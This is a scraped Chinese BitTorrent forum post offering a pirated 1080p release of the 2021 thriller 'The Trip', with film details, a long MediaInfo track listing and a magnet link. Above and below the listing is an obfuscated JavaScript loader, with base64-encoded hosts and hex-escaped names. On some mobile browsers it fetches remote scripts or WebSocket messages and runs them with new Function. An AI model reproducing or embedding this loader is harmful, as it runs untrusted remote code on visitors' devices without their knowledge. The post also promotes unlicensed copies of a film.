在糟糕的日子里[中文字幕].The.Trip.2021.1080p.NF.WEB-DL.DDP5.1.x264 7.94GB

版主小s 1月前 300

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 在糟糕的日子里 / The Trip

◎片 名 I onde dager

◎年 代 2021

◎产 地 美国

◎类 别 惊悚

◎语 言 挪威语 Norwegian

◎上映日期 2021-07-30(挪威)

◎IMDb链接 https://www.imdb.com/title/tt13109952/

◎豆瓣链接 https://movie.douban.com/subject/35293160/

◎片 长 117分钟

◎导 演 托米·维尔科拉 Tommy Wirkola (id:1326500)

◎编 剧 尼克·鲍尔 Nick Ball (id:1172494)

约翰·尼文 John Niven (id:1356477)

◎演 员 劳米·拉佩斯 Noomi Rapace (id:1013796)

阿卡塞尔·亨涅 Aksel Hennie (id:1041449)

◎简 介

A dysfunctional couple head to a remote cabin to reconnect, but each has intentions to kill the other. Before they can carry out their plans, unexpected visitors arrive and they faced with a greater danger.

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 107519491338847102380880330110587364431 (0x50E3803443717FF43982B2F631D3E44F)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.94 GiB

  8. Duration : 1 h 54 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 9 956 kb/s

  11. Encoded date : UTC 2021-10-15 13:12:48

  12. Writing application : mkvmerge v44.0.0 ('Domino') 64-bit

  13. Writing library : libebml v1.3.10 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 4 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 4 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 54 min

  24. Bit rate mode : Variable

  25. Bit rate : 3 548 kb/s

  26. Maximum bit rate : 20.0 Mb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 24.000 FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.071

  37. Stream size : 2.83 GiB (36%)

  38. Writing library : x264 core 148 r2724 dbe0335

  39. Encoding settings : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=16.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3

  45. Format/Info : Enhanced AC-3

  46. Commercial name : Dolby Digital Plus

  47. Codec ID : A_EAC3

  48. Duration : 1 h 54 min

  49. Bit rate mode : Constant

  50. Bit rate : 640 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 523 MiB (6%)

  57. Title : Norwegian

  58. Language : Norwegian

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : E-AC-3

  65. Format/Info : Enhanced AC-3

  66. Commercial name : Dolby Digital Plus

  67. Codec ID : A_EAC3

  68. Duration : 1 h 54 min

  69. Bit rate mode : Constant

  70. Bit rate : 640 kb/s

  71. Channel(s) : 6 channels

  72. Channel layout : L R C LFE Ls Rs

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 523 MiB (6%)

  77. Title : English

  78. Language : English

  79. Service kind : Complete Main

  80. Default : No

  81. Forced : No


  82. Audio #3

  83. ID : 4

  84. Format : E-AC-3

  85. Format/Info : Enhanced AC-3

  86. Commercial name : Dolby Digital Plus

  87. Codec ID : A_EAC3

  88. Duration : 1 h 54 min

  89. Bit rate mode : Constant

  90. Bit rate : 640 kb/s

  91. Channel(s) : 6 channels

  92. Channel layout : L R C LFE Ls Rs

  93. Sampling rate : 48.0 kHz

  94. Frame rate : 31.250 FPS (1536 SPF)

  95. Compression mode : Lossy

  96. Stream size : 523 MiB (6%)

  97. Title : French

  98. Language : French

  99. Service kind : Complete Main

  100. Default : No

  101. Forced : No


  102. Audio #4

  103. ID : 5

  104. Format : E-AC-3

  105. Format/Info : Enhanced AC-3

  106. Commercial name : Dolby Digital Plus

  107. Codec ID : A_EAC3

  108. Duration : 1 h 54 min

  109. Bit rate mode : Constant

  110. Bit rate : 640 kb/s

  111. Channel(s) : 6 channels

  112. Channel layout : L R C LFE Ls Rs

  113. Sampling rate : 48.0 kHz

  114. Frame rate : 31.250 FPS (1536 SPF)

  115. Compression mode : Lossy

  116. Stream size : 523 MiB (6%)

  117. Title : Hungarian

  118. Language : Hungarian

  119. Service kind : Complete Main

  120. Default : No

  121. Forced : No


  122. Audio #5

  123. ID : 6

  124. Format : E-AC-3

  125. Format/Info : Enhanced AC-3

  126. Commercial name : Dolby Digital Plus

  127. Codec ID : A_EAC3

  128. Duration : 1 h 54 min

  129. Bit rate mode : Constant

  130. Bit rate : 640 kb/s

  131. Channel(s) : 6 channels

  132. Channel layout : L R C LFE Ls Rs

  133. Sampling rate : 48.0 kHz

  134. Frame rate : 31.250 FPS (1536 SPF)

  135. Compression mode : Lossy

  136. Stream size : 523 MiB (6%)

  137. Title : Italian

  138. Language : Italian

  139. Service kind : Complete Main

  140. Default : No

  141. Forced : No


  142. Audio #6

  143. ID : 7

  144. Format : E-AC-3

  145. Format/Info : Enhanced AC-3

  146. Commercial name : Dolby Digital Plus

  147. Codec ID : A_EAC3

  148. Duration : 1 h 54 min

  149. Bit rate mode : Constant

  150. Bit rate : 640 kb/s

  151. Channel(s) : 6 channels

  152. Channel layout : L R C LFE Ls Rs

  153. Sampling rate : 48.0 kHz

  154. Frame rate : 31.250 FPS (1536 SPF)

  155. Compression mode : Lossy

  156. Stream size : 523 MiB (6%)

  157. Title : Polish

  158. Language : Polish

  159. Service kind : Complete Main

  160. Default : No

  161. Forced : No


  162. Audio #7

  163. ID : 8

  164. Format : E-AC-3

  165. Format/Info : Enhanced AC-3

  166. Commercial name : Dolby Digital Plus

  167. Codec ID : A_EAC3

  168. Duration : 1 h 54 min

  169. Bit rate mode : Constant

  170. Bit rate : 640 kb/s

  171. Channel(s) : 6 channels

  172. Channel layout : L R C LFE Ls Rs

  173. Sampling rate : 48.0 kHz

  174. Frame rate : 31.250 FPS (1536 SPF)

  175. Compression mode : Lossy

  176. Stream size : 523 MiB (6%)

  177. Title : Brazilian Portuguese

  178. Language : Portuguese

  179. Service kind : Complete Main

  180. Default : No

  181. Forced : No


  182. Audio #8

  183. ID : 9

  184. Format : E-AC-3

  185. Format/Info : Enhanced AC-3

  186. Commercial name : Dolby Digital Plus

  187. Codec ID : A_EAC3

  188. Duration : 1 h 54 min

  189. Bit rate mode : Constant

  190. Bit rate : 640 kb/s

  191. Channel(s) : 6 channels

  192. Channel layout : L R C LFE Ls Rs

  193. Sampling rate : 48.0 kHz

  194. Frame rate : 31.250 FPS (1536 SPF)

  195. Compression mode : Lossy

  196. Stream size : 523 MiB (6%)

  197. Title : Spanish

  198. Language : Spanish

  199. Service kind : Complete Main

  200. Default : No

  201. Forced : No


  202. Audio #9

  203. ID : 10

  204. Format : E-AC-3

  205. Format/Info : Enhanced AC-3

  206. Commercial name : Dolby Digital Plus

  207. Codec ID : A_EAC3

  208. Duration : 1 h 54 min

  209. Bit rate mode : Constant

  210. Bit rate : 640 kb/s

  211. Channel(s) : 6 channels

  212. Channel layout : L R C LFE Ls Rs

  213. Sampling rate : 48.0 kHz

  214. Frame rate : 31.250 FPS (1536 SPF)

  215. Compression mode : Lossy

  216. Stream size : 523 MiB (6%)

  217. Title : European Spanish

  218. Language : Spanish

  219. Service kind : Complete Main

  220. Default : No

  221. Forced : No


  222. Audio #10

  223. ID : 11

  224. Format : E-AC-3

  225. Format/Info : Enhanced AC-3

  226. Commercial name : Dolby Digital Plus

  227. Codec ID : A_EAC3

  228. Duration : 1 h 54 min

  229. Bit rate mode : Constant

  230. Bit rate : 640 kb/s

  231. Channel(s) : 6 channels

  232. Channel layout : L R C LFE Ls Rs

  233. Sampling rate : 48.0 kHz

  234. Frame rate : 31.250 FPS (1536 SPF)

  235. Compression mode : Lossy

  236. Stream size : 523 MiB (6%)

  237. Title : Turkish

  238. Language : Turkish

  239. Service kind : Complete Main

  240. Default : No

  241. Forced : No


  242. Text #1

  243. ID : 12

  244. Format : UTF-8

  245. Codec ID : S_TEXT/UTF8

  246. Codec ID/Info : UTF-8 Plain Text

  247. Duration : 1 h 52 min

  248. Bit rate : 32 b/s

  249. Count of elements : 1028

  250. Stream size : 27.2 KiB (0%)

  251. Title : English

  252. Language : English

  253. Default : Yes

  254. Forced : No


  255. Text #2

  256. ID : 13

  257. Format : UTF-8

  258. Codec ID : S_TEXT/UTF8

  259. Codec ID/Info : UTF-8 Plain Text

  260. Duration : 1 h 52 min

  261. Bit rate : 68 b/s

  262. Count of elements : 1100

  263. Stream size : 56.9 KiB (0%)

  264. Title : Arabic

  265. Language : Arabic

  266. Default : No

  267. Forced : No


  268. Text #3

  269. ID : 14

  270. Format : UTF-8

  271. Codec ID : S_TEXT/UTF8

  272. Codec ID/Info : UTF-8 Plain Text

  273. Duration : 1 h 52 min

  274. Bit rate : 42 b/s

  275. Count of elements : 1099

  276. Stream size : 35.2 KiB (0%)

  277. Title : Chinese Simplified

  278. Language : Chinese

  279. Default : No

  280. Forced : No


  281. Text #4

  282. ID : 15

  283. Format : UTF-8

  284. Codec ID : S_TEXT/UTF8

  285. Codec ID/Info : UTF-8 Plain Text

  286. Duration : 1 h 52 min

  287. Bit rate : 40 b/s

  288. Count of elements : 1143

  289. Stream size : 33.2 KiB (0%)

  290. Title : Chinese Traditional

  291. Language : Chinese

  292. Default : No

  293. Forced : No


  294. Text #5

  295. ID : 16

  296. Format : UTF-8

  297. Codec ID : S_TEXT/UTF8

  298. Codec ID/Info : UTF-8 Plain Text

  299. Duration : 1 h 52 min

  300. Bit rate : 32 b/s

  301. Count of elements : 1090

  302. Stream size : 26.6 KiB (0%)

  303. Title : Croatian

  304. Language : Croatian

  305. Default : No

  306. Forced : No


  307. Text #6

  308. ID : 17

  309. Format : UTF-8

  310. Codec ID : S_TEXT/UTF8

  311. Codec ID/Info : UTF-8 Plain Text

  312. Duration : 1 h 50 min

  313. Bit rate : 34 b/s

  314. Count of elements : 1086

  315. Stream size : 28.2 KiB (0%)

  316. Title : Czech

  317. Language : Czech

  318. Default : No

  319. Forced : No


  320. Text #7

  321. ID : 18

  322. Format : UTF-8

  323. Codec ID : S_TEXT/UTF8

  324. Codec ID/Info : UTF-8 Plain Text

  325. Duration : 1 h 52 min

  326. Bit rate : 35 b/s

  327. Count of elements : 1084

  328. Stream size : 29.3 KiB (0%)

  329. Title : Danish

  330. Language : Danish

  331. Default : No

  332. Forced : No


  333. Text #8

  334. ID : 19

  335. Format : UTF-8

  336. Codec ID : S_TEXT/UTF8

  337. Codec ID/Info : UTF-8 Plain Text

  338. Duration : 1 h 50 min

  339. Bit rate : 34 b/s

  340. Count of elements : 986

  341. Stream size : 28.1 KiB (0%)

  342. Title : Dutch

  343. Language : Dutch

  344. Default : No

  345. Forced : No


  346. Text #9

  347. ID : 20

  348. Format : UTF-8

  349. Codec ID : S_TEXT/UTF8

  350. Codec ID/Info : UTF-8 Plain Text

  351. Duration : 1 h 52 min

  352. Bit rate : 30 b/s

  353. Count of elements : 1024

  354. Stream size : 25.6 KiB (0%)

  355. Title : Finnish

  356. Language : Finnish

  357. Default : No

  358. Forced : No


  359. Text #10

  360. ID : 21

  361. Format : UTF-8

  362. Codec ID : S_TEXT/UTF8

  363. Codec ID/Info : UTF-8 Plain Text

  364. Duration : 1 h 52 min

  365. Bit rate : 33 b/s

  366. Count of elements : 1139

  367. Stream size : 27.9 KiB (0%)

  368. Title : French

  369. Language : French

  370. Default : No

  371. Forced : No


  372. Text #11

  373. ID : 22

  374. Format : UTF-8

  375. Codec ID : S_TEXT/UTF8

  376. Codec ID/Info : UTF-8 Plain Text

  377. Duration : 1 h 52 min

  378. Bit rate : 59 b/s

  379. Count of elements : 1103

  380. Stream size : 48.9 KiB (0%)

  381. Title : Greek

  382. Language : Greek

  383. Default : No

  384. Forced : No


  385. Text #12

  386. ID : 23

  387. Format : UTF-8

  388. Codec ID : S_TEXT/UTF8

  389. Codec ID/Info : UTF-8 Plain Text

  390. Duration : 1 h 52 min

  391. Bit rate : 58 b/s

  392. Count of elements : 1094

  393. Stream size : 47.9 KiB (0%)

  394. Title : Hebrew

  395. Language : Hebrew

  396. Default : No

  397. Forced : No


  398. Text #13

  399. ID : 24

  400. Format : UTF-8

  401. Codec ID : S_TEXT/UTF8

  402. Codec ID/Info : UTF-8 Plain Text

  403. Duration : 1 h 52 min

  404. Bit rate : 34 b/s

  405. Count of elements : 1078

  406. Stream size : 28.4 KiB (0%)

  407. Title : Hungarian

  408. Language : Hungarian

  409. Default : No

  410. Forced : No


  411. Text #14

  412. ID : 25

  413. Format : UTF-8

  414. Codec ID : S_TEXT/UTF8

  415. Codec ID/Info : UTF-8 Plain Text

  416. Duration : 1 h 52 min

  417. Bit rate : 35 b/s

  418. Count of elements : 1096

  419. Stream size : 29.1 KiB (0%)

  420. Title : Indonesian

  421. Language : Indonesian

  422. Default : No

  423. Forced : No


  424. Text #15

  425. ID : 26

  426. Format : UTF-8

  427. Codec ID : S_TEXT/UTF8

  428. Codec ID/Info : UTF-8 Plain Text

  429. Duration : 1 h 52 min

  430. Bit rate : 33 b/s

  431. Count of elements : 1095

  432. Stream size : 28.0 KiB (0%)

  433. Title : Italian

  434. Language : Italian

  435. Default : No

  436. Forced : No


  437. Text #16

  438. ID : 27

  439. Format : UTF-8

  440. Codec ID : S_TEXT/UTF8

  441. Codec ID/Info : UTF-8 Plain Text

  442. Duration : 1 h 52 min

  443. Bit rate : 35 b/s

  444. Count of elements : 1164

  445. Stream size : 29.5 KiB (0%)

  446. Title : Japanese

  447. Language : Japanese

  448. Default : No

  449. Forced : No


  450. Text #17

  451. ID : 28

  452. Format : UTF-8

  453. Codec ID : S_TEXT/UTF8

  454. Codec ID/Info : UTF-8 Plain Text

  455. Duration : 1 h 52 min

  456. Bit rate : 45 b/s

  457. Count of elements : 1111

  458. Stream size : 37.3 KiB (0%)

  459. Title : Korean

  460. Language : Korean

  461. Default : No

  462. Forced : No


  463. Text #18

  464. ID : 29

  465. Format : UTF-8

  466. Codec ID : S_TEXT/UTF8

  467. Codec ID/Info : UTF-8 Plain Text

  468. Duration : 1 h 52 min

  469. Bit rate : 34 b/s

  470. Count of elements : 1128

  471. Stream size : 28.8 KiB (0%)

  472. Title : Malay

  473. Language : Malay

  474. Default : No

  475. Forced : No


  476. Text #19

  477. ID : 30

  478. Format : UTF-8

  479. Codec ID : S_TEXT/UTF8

  480. Codec ID/Info : UTF-8 Plain Text

  481. Duration : 1 h 52 min

  482. Bit rate : 53 b/s

  483. Count of elements : 1502

  484. Stream size : 44.0 KiB (0%)

  485. Title : Norwegian Bokmal

  486. Language : Norwegian Bokmal

  487. Default : No

  488. Forced : No


  489. Text #20

  490. ID : 31

  491. Format : UTF-8

  492. Codec ID : S_TEXT/UTF8

  493. Codec ID/Info : UTF-8 Plain Text

  494. Duration : 1 h 46 min

  495. Bit rate : 10 b/s

  496. Count of elements : 339

  497. Stream size : 8.04 KiB (0%)

  498. Title : Norwegian Bokmal (Forced)

  499. Language : Norwegian Bokmal

  500. Default : No

  501. Forced : Yes


  502. Text #21

  503. ID : 32

  504. Format : UTF-8

  505. Codec ID : S_TEXT/UTF8

  506. Codec ID/Info : UTF-8 Plain Text

  507. Duration : 1 h 52 min

  508. Bit rate : 34 b/s

  509. Count of elements : 1076

  510. Stream size : 28.1 KiB (0%)

  511. Title : Polish

  512. Language : Polish

  513. Default : No

  514. Forced : No


  515. Text #22

  516. ID : 33

  517. Format : UTF-8

  518. Codec ID : S_TEXT/UTF8

  519. Codec ID/Info : UTF-8 Plain Text

  520. Duration : 1 h 52 min

  521. Bit rate : 36 b/s

  522. Count of elements : 1078

  523. Stream size : 30.1 KiB (0%)

  524. Title : Portuguese

  525. Language : Portuguese

  526. Default : No

  527. Forced : No


  528. Text #23

  529. ID : 34

  530. Format : UTF-8

  531. Codec ID : S_TEXT/UTF8

  532. Codec ID/Info : UTF-8 Plain Text

  533. Duration : 1 h 52 min

  534. Bit rate : 34 b/s

  535. Count of elements : 1091

  536. Stream size : 28.7 KiB (0%)

  537. Title : Brazilian Portuguese

  538. Language : Portuguese

  539. Default : No

  540. Forced : No


  541. Text #24

  542. ID : 35

  543. Format : UTF-8

  544. Codec ID : S_TEXT/UTF8

  545. Codec ID/Info : UTF-8 Plain Text

  546. Duration : 1 h 52 min

  547. Bit rate : 38 b/s

  548. Count of elements : 1083

  549. Stream size : 32.2 KiB (0%)

  550. Title : Romanian

  551. Language : Romanian

  552. Default : No

  553. Forced : No


  554. Text #25

  555. ID : 36

  556. Format : UTF-8

  557. Codec ID : S_TEXT/UTF8

  558. Codec ID/Info : UTF-8 Plain Text

  559. Duration : 1 h 52 min

  560. Bit rate : 54 b/s

  561. Count of elements : 1084

  562. Stream size : 45.4 KiB (0%)

  563. Title : Russian

  564. Language : Russian

  565. Default : No

  566. Forced : No


  567. Text #26

  568. ID : 37

  569. Format : UTF-8

  570. Codec ID : S_TEXT/UTF8

  571. Codec ID/Info : UTF-8 Plain Text

  572. Duration : 1 h 52 min

  573. Bit rate : 35 b/s

  574. Count of elements : 1122

  575. Stream size : 29.7 KiB (0%)

  576. Title : Spanish

  577. Language : Spanish

  578. Default : No

  579. Forced : No


  580. Text #27

  581. ID : 38

  582. Format : UTF-8

  583. Codec ID : S_TEXT/UTF8

  584. Codec ID/Info : UTF-8 Plain Text

  585. Duration : 1 h 52 min

  586. Bit rate : 34 b/s

  587. Count of elements : 1097

  588. Stream size : 28.9 KiB (0%)

  589. Title : European Spanish

  590. Language : Spanish

  591. Default : No

  592. Forced : No


  593. Text #28

  594. ID : 39

  595. Format : UTF-8

  596. Codec ID : S_TEXT/UTF8

  597. Codec ID/Info : UTF-8 Plain Text

  598. Duration : 1 h 52 min

  599. Bit rate : 26 b/s

  600. Count of elements : 826

  601. Stream size : 22.1 KiB (0%)

  602. Title : Swedish

  603. Language : Swedish

  604. Default : No

  605. Forced : No


  606. Text #29

  607. ID : 40

  608. Format : UTF-8

  609. Codec ID : S_TEXT/UTF8

  610. Codec ID/Info : UTF-8 Plain Text

  611. Duration : 1 h 52 min

  612. Bit rate : 88 b/s

  613. Count of elements : 1100

  614. Stream size : 73.4 KiB (0%)

  615. Title : Thai

  616. Language : Thai

  617. Default : No

  618. Forced : No


  619. Text #30

  620. ID : 41

  621. Format : UTF-8

  622. Codec ID : S_TEXT/UTF8

  623. Codec ID/Info : UTF-8 Plain Text

  624. Duration : 1 h 52 min

  625. Bit rate : 34 b/s

  626. Count of elements : 1082

  627. Stream size : 28.9 KiB (0%)

  628. Title : Turkish

  629. Language : Turkish

  630. Default : No

  631. Forced : No


  632. Text #31

  633. ID : 42

  634. Format : UTF-8

  635. Codec ID : S_TEXT/UTF8

  636. Codec ID/Info : UTF-8 Plain Text

  637. Duration : 1 h 52 min

  638. Bit rate : 53 b/s

  639. Count of elements : 1090

  640. Stream size : 44.1 KiB (0%)

  641. Title : Ukrainian

  642. Language : Ukrainian

  643. Default : No

  644. Forced : No


  645. Text #32

  646. ID : 43

  647. Format : UTF-8

  648. Codec ID : S_TEXT/UTF8

  649. Codec ID/Info : UTF-8 Plain Text

  650. Duration : 1 h 52 min

  651. Bit rate : 50 b/s

  652. Count of elements : 1091

  653. Stream size : 41.8 KiB (0%)

  654. Title : Vietnamese

  655. Language : Vietnamese

  656. Default : No

  657. Forced : No




复制代码


TAGS 惊悚

磁力链:
  • magnet:?xt=urn:btih:54CB682BC4B29745E0B899DF84432BAB302DEA6E

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};